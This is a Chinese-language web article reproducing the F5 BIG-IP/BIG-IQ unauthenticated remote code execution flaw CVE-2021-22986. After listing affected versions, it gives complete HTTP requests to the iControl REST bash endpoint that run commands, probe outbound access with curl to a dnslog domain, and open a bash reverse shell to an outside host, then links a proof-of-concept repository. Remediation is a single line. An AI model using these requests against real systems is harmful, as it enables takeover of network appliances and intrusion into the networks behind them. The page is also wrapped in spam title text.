91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

發布時間:2021-12-29 17:40:38 來源:億速云 閱讀:298 作者:柒染 欄目:安全技術

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

0x00漏洞簡述

F5 BIG-IP 是美國 F5 公司的一款集成了網絡流量管理、應用程序安全管理、負載均衡等功能的應用交付平臺。

2021 年3月10日,F5官方發布安全通告,安全更新包含了影響F5的BIG-IP,BIG-IQ設備的多個高危漏洞,漏洞編號分別為CVE-2021-22986,CVE-2021-22987,CVE-2021-22988,CVE-2021-22989,CVE-2021-22990,CVE-2021-22991,CVE-2021-22992;其中CVE-2021-22986為F5 BIG-IP/IQ設備 iControl REST接口的未授權遠程代碼執行漏洞,漏洞評分9.8,評級嚴重。F5安全公告更新了BIG-IP,BIG-IQ中的多個嚴重漏洞。建議廣大用戶及時將f5 big-iq,f5 big-ip升級到最新版本,避免遭到攻擊。

0x01影響版本

BIG-IP 16.0.0-16.0.1
BIG-IP 15.1.0-15.1.2
BIG-IP 14.1.0-14.1.3.1
BIG-IP 13.1.0-13.1.3.5
BIG-IP 12.1.0-12.1.5.2
BIG-IQ 7.1.0-7.1.0.2
BIG-IQ 7.0.0-7.0.0.1
BIG-IQ 6.0.0-6.1.0

0x02漏洞復現

部署安裝F5 BIG-IPV漏洞測試靶場環境。

1、訪問漏洞環境

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

2、POC驗證,進行命令執行操作

1.系統命令執行

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 41

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

2.通過dnslog探測是否可以出網

生成域名:zg8ie5.dnslog.cn

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

出網探測

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 62

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c 'curl zg8ie5.dnslog.cn'"}

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

發現可以出網

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

3.通過bash反彈shell到vps

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 83

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/6.6.6.6/12377 0>&1'"}

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

漏洞驗證python腳本

https://github.com/PeiQi0/PeiQi-WIKI-POC

0x03修復建議

升級到最新版本

關于F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

海盐县| 孙吴县| 拜城县| 安多县| 五原县| 赣州市| 厦门市| 惠安县| 红原县| 隆子县| 内乡县| 灌云县| 鄯善县| 万宁市| 浮山县| 宽甸| 临湘市| 宁德市| 兴海县| 宝丰县| 深泽县| 虞城县| 化州市| 健康| 凤城市| 花垣县| 奎屯市| 乌兰浩特市| 靖远县| 长岛县| 太康县| 普格县| 宜宾市| 博白县| 定陶县| 溧阳市| 禹州市| 黎城县| 布拖县| 柳河县| 通州市|